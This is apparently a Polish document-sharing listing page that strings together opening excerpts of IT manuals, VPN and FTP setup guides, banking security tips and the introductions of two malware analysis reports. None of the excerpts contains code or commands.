Wprowadzenie 1 e-audytor v.3.x INSTRUKCJA INSTALACJI I URUCHOMIENIA SYSTEMU W celu wyłączenia automatycznego QuickStartu należy z poziomu econsole w menu: Narzędzia > Konfiguracja > e-console w Konfiguracji
Bardziej szczegółowoZadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp.
T: Konfiguracja usługi ftp w systemie Windows 8.1. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. FTP (ang. File Transfer Protocol) protokół transferu plików umożliwiający
Bardziej szczegółowo"Procedura obsługi certyfikatów dla KDPW_TR (U2A)"
"Procedura obsługi certyfikatów dla KDPW_TR (U2A)" Wersja 1.0 Spis treści Dostęp do Repozytorium transakcji KDPW_TR w trybie U2A... 3 Wymagania systemowe... 4 Wniosek certyfikacyjny... 5 Status zgłoszenia
Bardziej szczegółowoSkrócona instrukcja obsługi systemu VPN w Szkole Głównej Handlowej w Warszawie
Skrócona instrukcja obsługi systemu VPN w Szkole Głównej Handlowej w Warszawie ver. 1.2 (2015.04.24) Wprowadzenie VPN to skrót od nazwy Virtual Personal Network (Wirtualna Sieć Prywatna) umożliwiająca
Bardziej szczegółowoProjektowanie bezpieczeństwa sieci i serwerów
Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia
Bardziej szczegółowoUsługi sieciowe systemu Linux
Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do
Bardziej szczegółowoInstrukcja instalacji aplikacji Comarch Smart Card ToolBox
Instrukcja instalacji aplikacji Comarch Smart Card ToolBox dla urządzeń kryptograficznych Bankowość Internetowa R-Online Biznes Spis treści 1. Instalacja aplikacji Comarch Crypto Provider w systemie Windows....
Bardziej szczegółowoPołączenie VPN aplikacji SSL. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Profile aplikacji SSL 1.3. Konto SSL 1.4. Grupa użytkowników
1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Profile aplikacji SSL 1.3. Konto SSL 1.4. Grupa użytkowników 2. Konfiguracja klienta VPN 2.1. Ustawienia ogólne 2.2. Aplikacja VNC 2.3. Aplikacja
Bardziej szczegółowoInstrukcja do programu Roger Licensing Server v1.0.0 Rev. A
Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Spis treści Spis treści... 2 Wprowadzenie... 3 Przeznaczenie... 3 Moduły... 3 Koncepcja działania... 3 Wymagania... 4 Instalacja... 5 Używanie
Bardziej szczegółowoKancelaria Prawna.WEB - POMOC
Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV
Bardziej szczegółowoSystem Kancelaris. Zdalny dostęp do danych
Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,
Bardziej szczegółowoInstalacja Legalis Intranet
Instalacja Legalis Intranet Wydawnictwo C.H.Beck 31 października 2006 Spis treści 1 Zarys 2 2 Serwer danych 2 2.1 Wymagania............................ 2 2.2 Instalacja usługi Legalis Serwer.................
Bardziej szczegółowoPORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl
PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl Do połączenia z serwerem A&B w celu załadowania lub pobrania materiałów można wykorzystać dowolny program typu "klient FTP". Jeżeli nie
Bardziej szczegółowoWyższa Szkoła Bankowa we Wrocławiu
Instrukcja korzystania z oprogramowania firmy Microsoft (subskrypcja DreamSpark Premium), udostępnionego Wyższej Szkole Bankowej we Wrocławiu, w ramach Microsoft IT Academy 1. Uprawnieni studenci Do korzystania
Bardziej szczegółowoWyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r.
Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. W dniach 21 25 stycznia 2012 miał miejsce szereg ataków na zasoby instytucji administracji państwowej,
Bardziej szczegółowoSposoby zdalnego sterowania pulpitem
Karolina Wieczorko, EMiI Sposoby zdalnego sterowania pulpitem Jest wiele opcji zdalnego sterowania pulpitem, począwszy od narzędzi systemowych, poprzez różnego rodzaju programy przez sieć internetową.
Bardziej szczegółowoWindows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK. I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej)
Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej) Uruchom maszynę wirtualną Server 2008 Zaloguj się do konta
Bardziej szczegółowoInstrukcja aplikacji R-Quick
Instrukcja aplikacji R-Quick Spis treści WYMAGANIA INSTALACYJNE ŚRODOWISKA ADOBE AIR I APLIKACJI R-QUICK... 2 INSTALACJA RĘCZNA ŚRODOWISKA AIR WINDOWS... 3 INSTALACJA RĘCZNA APLIKACJI R-Quick... 6 AUTOMATYCZNY
Bardziej szczegółowoAktualizacja dodatku Saba Security Plugin
Autor: BT131c Wersja: 1.0 Jan Dziubiński Data: 19.10.2017 Aktualizacja dodatku Saba Security Plugin w przeglądarce Firefox 56 Dokument jest własnością P.I. SABA SERVICE sp. z o.o. Podlega ewidencji i kontroli
Bardziej szczegółowoBiuletyn techniczny. Drukarki fiskalne w usługach terminalowych. Comarch OPT!MA 17.0. Copyright 2007 COMARCH SA
Biuletyn techniczny Comarch OPT!MA 17.0 Drukarki fiskalne w usługach terminalowych Copyright 2007 COMARCH SA 1 Spis treści 1 SPIS TREŚCI... 2 2 DRUKARKI FISKALNE W USŁUGACH TERMINALOWYCH... 3 2.1 2.2 INSTALACJA
Bardziej szczegółowoMetodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych
Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Krzysztof Młynarski (krzysztof.mlynarski@teleinformatica.com.pl) Teleinformatica Pomimo występowania bardzo wielu
Bardziej szczegółowoASEM UBIQUITY PRZEGLĄD FUNKCJONALNOŚCI
ASEM UBIQUITY PRZEGLĄD FUNKCJONALNOŚCI tel. 22 549 43 53, fax. 22 549 43 50, www.sabur.com.pl, sabur@sabur.com.pl 1/7 ASEM UBIQUITY ASEM Uqiuity to nowatorskie rozwiązanie na platformy Win 32/64 oraz Win
Bardziej szczegółowoZamawianie Taxi Instrukcja użytkownika
Zamawianie Taxi Instrukcja użytkownika 2009 Jarek Andrzejewski www.ptja.pl email: ptja@ptja.pl wersja 1.2.1, 22 października 2009 Spis treści 1.Uruchamianie programu...3 2.Pierwsze uruchomienie, aktywacja
Bardziej szczegółowoInstrukcja postępowania w celu złożenia podpisu elektronicznego na dokumentach składanych do SISC za pośrednictwem portalu PUESC.
Instrukcja postępowania w celu złożenia podpisu elektronicznego na dokumentach składanych do SISC za pośrednictwem portalu PUESC. Wersja 1.4 z dnia 17.11.2015 r. ul. Świętokrzyska 12, 00-916 Warszawa tel.:
Bardziej szczegółowoInstrukcja obsługi VPN w Szkole Gło wnej Handlowej w Warszawie
Instrukcja obsługi VPN w Szkole Gło wnej Handlowej w Warszawie Dariusz Jaruga. ver. 1.1 (19-01-2011) Wprowadzenie VPN to skrót od nazwy Virtual Personal Network (Wirtualna Sieć Prywatna) umożliwiająca
Bardziej szczegółowoAplikacja npodpis do obsługi certyfikatu
BANK SPÓŁDZIELCZY w Koninie Aplikacja npodpis do obsługi certyfikatu (instrukcja użytkownika) Wersja 06 https://www.bskonin.pl I. Słownik pojęć dalej zwana aplikacją; Internet Banking dla Firm dalej zwany
Bardziej szczegółowoDESlock+ szybki start
DESlock+ szybki start Wersja centralnie zarządzana Wersja bez centralnej administracji standalone WAŻNE! Pamiętaj, że jeśli chcesz korzystać z centralnego zarządzania koniecznie zacznij od instalacji serwera
Bardziej szczegółowoBrinet sp. z o.o. wyłączny przedstawiciel DrayTek w Polsce www.brinet.pl www.draytek.pl
1. Firmware Upgrade Utility 1.1. Metoda 1 (standardowa) 1.2. Metoda 2 (niestandardowa) 2. Serwer FTP 2.1. Lokalny serwer FTP 2.2. Zdalny serwer FTP 3. Upgrade przez Web Procedury aktualizacji zostały oparte
Bardziej szczegółowoWymagania do zdalnej instalacji agentów firmy StorageCraft
Wymagania do zdalnej instalacji agentów firmy StorageCraft Sytuacja Te wymagania są rekomendowane do zrealizowania przed wykonaniem zdalnej instalacji agentów ShadowProtect. Pomogą one także rozwiązad
Bardziej szczegółowoUNIFON podręcznik użytkownika
UNIFON podręcznik użytkownika Spis treści: Instrukcja obsługi programu Unifon...2 Instalacja aplikacji Unifon...3 Korzystanie z aplikacji Unifon...6 Test zakończony sukcesem...9 Test zakończony niepowodzeniem...14
Bardziej szczegółowoBezpieczeństwo systemu ebanknet w Banku Spółdzielczym w Brańsku
Bezpieczeństwo systemu ebanknet w Banku Spółdzielczym w Brańsku System bankowości elektronicznej ebanknet został stworzony w oparciu o technologię i doświadczenie znanej firmy informatycznej - lidera wśród
Bardziej szczegółowoKORZYSTANIE Z BAZY DANYCH UpToDate
KORZYSTANIE Z BAZY DANYCH UpToDate 1 KORZYSTANIE Z BAZY DANYCH UpToDate 1. Wejdź na stronę Biblioteki Głównej Uniwersytetu Medycznego w Lublinie: http://www.biblioteka.umlub.pl 2. W ZASOBY kliknij na Zdalny
Bardziej szczegółowoI. WSTĘP... 2 II. WYMAGANIA SYSTEMOWE... 2 III. DOSTĘP DO REPOZYTORIUM TRANSAKCJI... 2
Procedura obsługi certyfikatów KDPW_TR U2A Spis treści I. WSTĘP... 2 II. WYMAGANIA SYSTEMOWE... 2 III. DOSTĘP DO REPOZYTORIUM TRANSAKCJI... 2 IV. OBSŁUGA WNIOSKU CERTYFIKACYJNEGO... 2 IV.1. Złożenie wniosku
Bardziej szczegółowoAnaliza Trojana NotCompatible.C
Analiza Trojana NotCompatible.C Warszawa 2014-12-23 CERT OPL Malware Analysis Strona 1 z 11 1. Wstęp Pierwszy raz malware o nazwie NotCompatible został wykryty w 2012 roku. Na początku kod używany był
Bardziej szczegółowoZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja
ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.
Bardziej szczegółowoLogowanie do aplikacji TETA Web. Instrukcja Użytkownika
Logowanie do aplikacji TETA Web Instrukcja Użytkownika Spis treści 1 Wstęp... 2 1.1 O tym dokumencie... 2 1.2 Przyjęte oznaczenia... 2 1.3 Cel i zakres systemu... 2 1.4 Instalacja wtyczki Silverlight...
Bardziej szczegółowoRok szkolny 2015/16 Sylwester Gieszczyk. Wymagania edukacyjne w technikum
Lp. 1 Temat 1. Konfigurowanie urządzeń. Uzyskiwanie dostępu do sieci Internet 2 3 4 5 Symulatory programów konfiguracyjnych urządzeń Konfigurowanie urządzeń Konfigurowanie urządzeń sieci Funkcje zarządzalnych
Bardziej szczegółowodo podstawowych zasad bezpieczeństwa:
Korzystając z internetowego systemu I-Bank należy się stosować do podstawowych zasad bezpieczeństwa: 1. Należy korzystać z legalnego oprogramowania i regularnie je aktualizować. Na komputerze, na którym
Bardziej szczegółowoAnaliza aktywności złośliwego oprogramowania Orcus RAT
Analiza aktywności złośliwego oprogramowania Orcus RAT CERT OPL, Analiza Orcus RAT; Autor: Iwo Graj Strona 1 z 50 Remote Access Tool znany pod nazwą Orcus to jedna z popularniejszych w ostatnim czasie
Bardziej szczegółowoWINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.
WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy
Bardziej szczegółowoWymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk:
Nr Sprawy KP- 42 /2006 Załącznik nr 1 Do Specyfikacji Istotnych Warunków Zamówienia Wymagania techniczne dla programów antywirusowych Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość
Bardziej szczegółowoLicencja SEE Electrical Free
Instrukcja Instalacji Licencja SEE Electrical Free V7R2 COPYRIGHT 2013 Wszelkie prawa zastrzeżone COPYRIGHT sierpień 2016 IGE+XAO Polska Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości
Bardziej szczegółowoInstrukcja obsługi programu CMS Dla rejestratorów HANBANG
Instrukcja obsługi programu CMS Dla rejestratorów HANBANG 1. Wymagania sprzętowe: Minimalne wymagania sprzętowe: System operacyjny: Windows Serwer 2003 Standard Edition SP2 Baza danych: Mysql5.0 Procesor:
Bardziej szczegółowoZdalne logowanie do serwerów
Zdalne logowanie Zdalne logowanie do serwerów Zdalne logowanie do serwerów - cd Logowanie do serwera inne podejście Sesje w sieci informatycznej Sesje w sieci informatycznej - cd Sesje w sieci informatycznej
Bardziej szczegółowoBEZPIECZEŃSTWO BANKOWOŚCI DETALICZNEJ
BEZPIECZEŃSTWO BANKOWOŚCI DETALICZNEJ Zachowania użytkownika, a ryzyko wykonywania operacji finansowych przez Internet. Bankowość elektroniczna jest wygodną i bezpieczną formą korzystania z usług bankowych,
Bardziej szczegółowoOtwock dn r. Do wszystkich Wykonawców
Otwock dn. 03.08.2017 r. Do wszystkich Wykonawców Dotyczy zapytania ofertowego na Dostawę systemu/oprogramowania zapewniającego ochronę antywirusową i antymalware ową sieci komputerowej SP ZOZ Szpitala
Bardziej szczegółowo